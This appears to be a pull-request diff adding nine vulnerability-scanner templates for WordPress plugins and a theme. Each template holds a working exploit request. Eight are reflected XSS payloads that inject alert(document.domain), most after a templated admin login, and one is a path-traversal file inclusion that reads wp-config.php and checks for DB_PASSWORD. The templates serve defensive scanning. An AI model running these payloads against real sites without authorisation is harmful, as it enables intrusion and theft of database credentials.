Merge pull request #3730 from DhiyaneshGeek/master

10 New Wordpress Template
2022-02-22 14:47:20 +05:30 · 2022-02-22 14:47:20 +05:30 · 22f35f3e23
parent a96ac0b251 af6ef0d47f
commit 22f35f3e23
9 changed files with 350 additions and 0 deletions
--- a/cves/2021/CVE-2021-25063.yaml
+++ b/cves/2021/CVE-2021-25063.yaml
@ -0,0 +1,45 @@
+id: CVE-2021-25063
+
+info:
+  name: Contact Form 7 Skins <= 2.5.0 - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin does not sanitise and escape the tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting
+  reference: https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-25063
+    cwe-id: CWE-79
+  tags: wordpress,wp-plugin,xss,contactform,wp,cve,cve2021
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<img src onerror=alert(document.domain)>' type='hidden"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
--- a/cves/2022/CVE-2022-0149.yaml
+++ b/cves/2022/CVE-2022-0149.yaml
@ -0,0 +1,45 @@
+id: CVE-2022-0149
+
+info:
+  name: WooCommerce – Store Exporter < 2.7.1 - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin was affected by a Reflected Cross-Site Scripting (XSS) vulnerability in the woo_ce admin page.
+  reference: https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2022-0149
+    cwe-id: CWE-79
+  tags: wordpress,wp-plugin,xss,woocommerce,cve,cve2022
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/wordpress/accessibility-helper-xss.yaml
+++ b/vulnerabilities/wordpress/accessibility-helper-xss.yaml
@ -0,0 +1,30 @@
+id: accessibility-helper-xss
+
+info:
+  name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDK
+  severity: medium
+  description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
+  reference: https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
+  tags: xss,wordpress,wp-plugin,wp
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "var wah_target_src = '';alert(document.domain);//';"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/wordpress/easy-social-feed.yaml
+++ b/vulnerabilities/wordpress/easy-social-feed.yaml
@ -0,0 +1,40 @@
+id: easy-social-feed
+
+info:
+  name: Easy Social Feed < 6.2.7 - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin does not sanitise and escape a parameter before outputting back in an admin dashboard page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged admin or editor.
+  reference: https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0
+  tags: wordpress,wp-plugin,xss,wp
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "'type' : '</script><script>alert(document.domain)</script>'"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/wordpress/elex-woocommerce-xss.yaml
+++ b/vulnerabilities/wordpress/elex-woocommerce-xss.yaml
@ -0,0 +1,40 @@
+id: elex-woocommerce-xss
+
+info:
+  name: ELEX WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin does not sanitise or escape the search GET parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue, which will be executed in a logged in admin context.
+  reference: https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e
+  tags: wordpress,wp-plugin,xss,wp,woocommerce
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/wordpress/feedwordpress-xss.yaml
+++ b/vulnerabilities/wordpress/feedwordpress-xss.yaml
@ -0,0 +1,40 @@
+id: feedwordpress-xss
+
+info:
+  name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
+  reference: https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
+  tags: wordpress,wp-plugin,xss,feedwordpress,wp
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"><img src=2 onerror=alert(document.domain)>" method="post">'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/wordpress/mthemeunus-lfi.yaml
+++ b/vulnerabilities/wordpress/mthemeunus-lfi.yaml
@ -0,0 +1,29 @@
+id: mthemeunus-lfi
+
+info:
+  name: mTheme-Unus Theme - Local File Inclusion (LFI)
+  author: dhiyaneshDk
+  severity: high
+  description: The mTheme-Unus WordPress Theme was affected by a css.php Local File Inclusion security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/bc036ee3-9648-49db-ae52-3a58fdeb82eb
+    - https://packetstormsecurity.com/files/133778/
+  tags: wordpress,wp-theme,lfi,wordpress,mtheme
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/wordpress/my-chatbot-xss.yaml
+++ b/vulnerabilities/wordpress/my-chatbot-xss.yaml
@ -0,0 +1,40 @@
+id: my-chatbot-xss
+
+info:
+  name: My Chatbot <= 1.1 - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin does not sanitise or escape its tab parameter in the Settings page before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue.
+  reference: https://wpscan.com/vulnerability/c0b6f63b-95d1-4782-9554-975d6d7bbd3d
+  tags: wordpress,wp-plugin,xss,wp
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
--- a/vulnerabilities/wordpress/wp-whmcs-xss.yaml
+++ b/vulnerabilities/wordpress/wp-whmcs-xss.yaml
@ -0,0 +1,41 @@
+id: wp-whmcs-xss
+
+info:
+  name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDk
+  severity: medium
+  description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
+  reference: https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
+  tags: wordpress,wp-plugin,wp,whmcs,xss
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<strong><img src onerror=alert(document.domain)></strong>"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200